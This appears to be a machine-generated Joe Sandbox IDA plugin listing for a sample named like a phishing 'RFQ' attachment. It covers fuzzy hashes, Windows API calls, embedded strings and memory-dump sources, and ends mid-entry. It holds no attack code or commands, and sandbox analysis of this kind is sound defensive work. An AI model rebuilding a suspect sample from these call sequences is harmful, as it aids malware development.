                                                            • Instruction ID: f8fb68e4f59f12f9588ef37bbf1cd7f799bc5da1ac83eba2ca3c0b32fa204c15
                                                            • Opcode Fuzzy Hash: 1357fb42c355c89b468a164d4eeb5dc70621fb7aa29c3d44b976f33a6b925427
                                                            • Instruction Fuzzy Hash: FF513FB1B00705AFDF18CF69DD86AAEBBBAFB98700F148529F519D7290E7749D008B50
                                                            APIs
                                                              • Part of subcall function 007CB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007CB759,?,00000000,?,?,?,?,007CB72B,00000000,?), ref: 007CBA58
                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,007CB72B), ref: 007CB7F6
                                                            • KillTimer.USER32(00000000,?,00000000,?,?,?,?,007CB72B,00000000,?,?,007CB2EF,?,?), ref: 007CB88D
                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 0082D8A6
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007CB72B,00000000,?,?,007CB2EF,?,?), ref: 0082D8D7
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007CB72B,00000000,?,?,007CB2EF,?,?), ref: 0082D8EE
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007CB72B,00000000,?,?,007CB2EF,?,?), ref: 0082D90A
                                                            • DeleteObject.GDI32(00000000), ref: 0082D91C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                            • String ID:
                                                            • API String ID: 641708696-0
                                                            • Opcode ID: f7742ddbc3234abb8f037440382df0141f70d6c1d04cbb7382ecb16936b1ea6a
                                                            • Instruction ID: ff8db49d5563120e4b902197a6e47c72d3da5edaab02b7bfd2af7e6ba7027553
                                                            • Opcode Fuzzy Hash: f7742ddbc3234abb8f037440382df0141f70d6c1d04cbb7382ecb16936b1ea6a
                                                            • Instruction Fuzzy Hash: 2A613A31501710DFDB259F28E98EB25BBF5FBA4711F14492EF48A86A64C778A8D0DB80
                                                            APIs
                                                              • Part of subcall function 007CB526: GetWindowLongW.USER32(?,000000EB), ref: 007CB537
                                                            • GetSysColor.USER32(0000000F), ref: 007CB438
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ColorLongWindow
                                                            • String ID:
                                                            • API String ID: 259745315-0
                                                            • Opcode ID: 985dff705f9c8a706cc6df1a9016e14a2f6cccceaf55004441dd9a4a05dae8a5
                                                            • Instruction ID: 7a01d11086726b578aea6eaa599102533aa6ce2902020a284bb25ab445640be2
                                                            • Opcode Fuzzy Hash: 985dff705f9c8a706cc6df1a9016e14a2f6cccceaf55004441dd9a4a05dae8a5
                                                            • Instruction Fuzzy Hash: DE41A030004290ABDF245F28E88AFB93B66FB46731F184669FD65CE1E6D7358D81DB21
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                            • String ID:
                                                            • API String ID: 136442275-0
                                                            • Opcode ID: 18d1490c2171cc1113387559fbbd2605aada32356dd6805c5d440b4a0fdf9bf4
                                                            • Instruction ID: a79bd14ee20e2a028720b82a4e22c815c8ca3f7ca5edfcac67ae8a06a33442e3
                                                            • Opcode Fuzzy Hash: 18d1490c2171cc1113387559fbbd2605aada32356dd6805c5d440b4a0fdf9bf4
                                                            • Instruction Fuzzy Hash: 80412E7684511CAECF61DB90CC46DDA73BDEB44300F0041E7F659A2251EB75ABE58FA0
                                                            APIs
                                                            • CharLowerBuffW.USER32(0084DC00,0084DC00,0084DC00), ref: 007FD7CE
                                                            • GetDriveTypeW.KERNEL32(?,00863A70,00000061), ref: 007FD898
                                                            • _wcscpy.LIBCMT ref: 007FD8C2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                            • API String ID: 2820617543-1000479233
                                                            • Opcode ID: 3467ec29c8ff273a3917317d17631e606fbc53c61385916647b6266cef5629fd
                                                            • Instruction ID: f7daf5ad9a4a3db9f71307e3e83c4ac938a002763432cb5339f56bcec9efaf98
                                                            • Opcode Fuzzy Hash: 3467ec29c8ff273a3917317d17631e606fbc53c61385916647b6266cef5629fd
                                                            • Instruction Fuzzy Hash: E2518031104308EFC720EF54D886BAEB7A6FF84354F10892DF69997292DB79ED05CA52
                                                            APIs
                                                            • __swprintf.LIBCMT ref: 007B93AB
                                                            • __itow.LIBCMT ref: 007B93DF
                                                              • Part of subcall function 007D1557: _xtow@16.LIBCMT ref: 007D1578
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: __itow__swprintf_xtow@16
                                                            • String ID: %.15g$0x%p$False$True
                                                            • API String ID: 1502193981-2263619337
                                                            • Opcode ID: 52182af60d9b50c65063db0fc768d50c14fd10dba73aafb27f2b0244082585ab
                                                            • Instruction ID: ca307e3b014efeb4b41ef3e407ebb1de2dae2941f35b1b07e7d3edd219aba634
                                                            • Opcode Fuzzy Hash: 52182af60d9b50c65063db0fc768d50c14fd10dba73aafb27f2b0244082585ab
                                                            • Instruction Fuzzy Hash: 0D41D671504214EBDB24DB78E945FAAB3F4FF44300F20446EF65AD7281EA399941CB60
                                                            APIs
                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0081A259
                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0081A260
                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0081A273
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0081A27B
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0081A286
                                                            • DeleteDC.GDI32(00000000), ref: 0081A28F
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0081A299
                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0081A2AD
                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0081A2B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                            • String ID: static
                                                            • API String ID: 2559357485-2160076837
                                                            • Opcode ID: ac9fcdc7955a95d8afc25bc20ea561ee6f3b73c0f9ae7dc8c145856e9dc42ebe
                                                            • Instruction ID: 356c18133c1c162f0b64dd6ad8ca478d068ee93983c29949d61270b9202da698
                                                            • Opcode Fuzzy Hash: ac9fcdc7955a95d8afc25bc20ea561ee6f3b73c0f9ae7dc8c145856e9dc42ebe
                                                            • Instruction Fuzzy Hash: 44318B31101214ABDF259FA4EC49FEA3B6DFF59360F110624FA29E60A0C736D861DBA5
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 2620052-3771769585
                                                            • Opcode ID: a61c6e1ab2119b48d3791ffb18471fe45764c8ed7628c033a31e2782754c09f0
                                                            • Instruction ID: 0b6b6fcd349365c3b7f4cc50fafe9d94ceee57474add7b4b5eb9d0687850b60a
                                                            • Opcode Fuzzy Hash: a61c6e1ab2119b48d3791ffb18471fe45764c8ed7628c033a31e2782754c09f0
                                                            • Instruction Fuzzy Hash: 5511DA7160421DEBDB24AB74AC4DEEA77BCEF40710F00056AF245D6291EF78DE858790
                                                            APIs
                                                            • _memset.LIBCMT ref: 007D5047
                                                              • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                            • __gmtime64_s.LIBCMT ref: 007D50E0
                                                            • __gmtime64_s.LIBCMT ref: 007D5116
                                                            • __gmtime64_s.LIBCMT ref: 007D5133
                                                            • __allrem.LIBCMT ref: 007D5189
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007D51A5
                                                            • __allrem.LIBCMT ref: 007D51BC
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007D51DA
                                                            • __allrem.LIBCMT ref: 007D51F1
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007D520F
                                                            • __invoke_watson.LIBCMT ref: 007D5280
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                            • String ID:
                                                            • API String ID: 384356119-0
                                                            • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                            • Instruction ID: 41bab9c9ce50feb99ca1fa12f601e57a7e2688661ce7e87743f1fc685d42a563
                                                            • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                            • Instruction Fuzzy Hash: 0771D5B2A01B16EBE714AE79CC46B6A73B8BF14764F14422BF414D6381E778ED408BD0
                                                            APIs
                                                            • _memset.LIBCMT ref: 007F4DF8
                                                            • GetMenuItemInfoW.USER32(00871708,000000FF,00000000,00000030), ref: 007F4E59
                                                            • SetMenuItemInfoW.USER32(00871708,00000004,00000000,00000030), ref: 007F4E8F
                                                            • Sleep.KERNEL32(000001F4), ref: 007F4EA1
                                                            • GetMenuItemCount.USER32(?), ref: 007F4EE5
                                                            • GetMenuItemID.USER32(?,00000000), ref: 007F4F01
                                                            • GetMenuItemID.USER32(?,-00000001), ref: 007F4F2B
                                                            • GetMenuItemID.USER32(?,?), ref: 007F4F70
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007F4FB6
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F4FCA
                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F4FEB
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                            • String ID:
                                                            • API String ID: 4176008265-0
                                                            • Opcode ID: 906876ead408647fd3ee83ed5b3365d0e043dd83619d1f5d4c4dcdd95115f6ae
                                                            • Instruction ID: dd141ea0f2a0ecfc6b34d526ec1e6352f5bf23141f1d6a01d0b3a78d91cdd8e7
                                                            • Opcode Fuzzy Hash: 906876ead408647fd3ee83ed5b3365d0e043dd83619d1f5d4c4dcdd95115f6ae
                                                            • Instruction Fuzzy Hash: D9617A7190024DAFDB21CFA8D888ABF7BF8BB41318F180559FA56A7351D738AD45CB20
                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00819C98
                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00819C9B
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00819CBF
                                                            • _memset.LIBCMT ref: 00819CD0
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00819CE2
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00819D5A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow_memset
                                                            • String ID:
                                                            • API String ID: 830647256-0
                                                            • Opcode ID: f23c12a89ee63ae4ee98f3b9a318d87691962950327ee8af507d6a91f703e3ce
                                                            • Instruction ID: ebcf2a33c6a66de9c65e50fb9b8393600011f7b32a675d43e0724c1bb013581d
                                                            • Opcode Fuzzy Hash: f23c12a89ee63ae4ee98f3b9a318d87691962950327ee8af507d6a91f703e3ce
                                                            • Instruction Fuzzy Hash: 35618B75900208AFDB10DFA8DC85EEE77B8FF09704F14415AFA58E7291D774AA82DB50
                                                            APIs
                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 007E94FE
                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 007E9549
                                                            • VariantInit.OLEAUT32(?), ref: 007E955B
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 007E957B
                                                            • VariantCopy.OLEAUT32(?,?), ref: 007E95BE
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 007E95D2
                                                            • VariantClear.OLEAUT32(?), ref: 007E95E7
                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 007E95F4
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007E95FD
                                                            • VariantClear.OLEAUT32(?), ref: 007E960F
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007E961A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID:
                                                            • API String ID: 2706829360-0
                                                            • Opcode ID: 0c84396098bfdc6ab754bd6c918a10f43214b4d10a9d279576cbda2d83d86160
                                                            • Instruction ID: 57c012868ca86783f9e0af7db298d78c1b6af9eabfc3ffc9d7cce0c39e6e82a0
                                                            • Opcode Fuzzy Hash: 0c84396098bfdc6ab754bd6c918a10f43214b4d10a9d279576cbda2d83d86160
                                                            • Instruction Fuzzy Hash: F2415E71900219EFCB01EFA5EC489DEBB79FF48354F008469F501A3251DB34EA55CBA5
                                                            APIs
                                                              • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                              • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                            • CoInitialize.OLE32 ref: 0080ADF6
                                                            • CoUninitialize.OLE32 ref: 0080AE01
                                                            • CoCreateInstance.OLE32(?,00000000,00000017,0083D8FC,?), ref: 0080AE61
                                                            • IIDFromString.OLE32(?,?), ref: 0080AED4
                                                            • VariantInit.OLEAUT32(?), ref: 0080AF6E
                                                            • VariantClear.OLEAUT32(?), ref: 0080AFCF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            • API String ID: 834269672-1287834457
                                                            • Opcode ID: de5d8e144fc928862ced869a9f70374409c798f5c0003468a9a5d5fc5f3e7ff1
                                                            • Instruction ID: 104b2ed65bd90340f6d6586e1d271917b8904a563cecd842025d7f960d2b4cbf
                                                            • Opcode Fuzzy Hash: de5d8e144fc928862ced869a9f70374409c798f5c0003468a9a5d5fc5f3e7ff1
                                                            • Instruction Fuzzy Hash: 4F615671208312AFC755DF64D889B6ABBE8FF88714F104819FA85DB291CB74ED44CB92
                                                            APIs
                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00808168
                                                            • inet_addr.WSOCK32(?,?,?), ref: 008081AD
                                                            • gethostbyname.WSOCK32(?), ref: 008081B9
                                                            • IcmpCreateFile.IPHLPAPI ref: 008081C7
                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00808237
                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0080824D
                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 008082C2
                                                            • WSACleanup.WSOCK32 ref: 008082C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                            • String ID: Ping
                                                            • API String ID: 1028309954-2246546115
                                                            • Opcode ID: 883df0f7c58f31fb073c3204c2db4a469662873549e9e508c0c858789a5a0de5
                                                            • Instruction ID: f5c2b9d3f2ee89cc00876776583f7863a3e706b0321de856fe4b25c4d13571c3
                                                            • Opcode Fuzzy Hash: 883df0f7c58f31fb073c3204c2db4a469662873549e9e508c0c858789a5a0de5
                                                            • Instruction Fuzzy Hash: A6517A31604704DFD760AB24DC49B6ABBE5FF48310F048829FA95DB2E1DB74E941CB41
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 007FE396
                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007FE40C
                                                            • GetLastError.KERNEL32 ref: 007FE416
                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 007FE483
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            • Opcode ID: 051aa775f3aadaec03d374f2a5f3340d18ea5efa507ca5cbfb4c2b4520b64d01
                                                            • Instruction ID: 270f41aa8b8737f233142a3c7e8d7041c010772b9919030dcc152160ae0cd68a
                                                            • Opcode Fuzzy Hash: 051aa775f3aadaec03d374f2a5f3340d18ea5efa507ca5cbfb4c2b4520b64d01
                                                            • Instruction Fuzzy Hash: C9314035A0024DDBDB01EB68D949BBEB7B4FF44300F148469FA15EB3A1DA789A01CB91
                                                            APIs
                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 007EB98C
                                                            • GetDlgCtrlID.USER32 ref: 007EB997
                                                            • GetParent.USER32 ref: 007EB9B3
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 007EB9B6
                                                            • GetDlgCtrlID.USER32(?), ref: 007EB9BF
                                                            • GetParent.USER32(?), ref: 007EB9DB
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 007EB9DE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
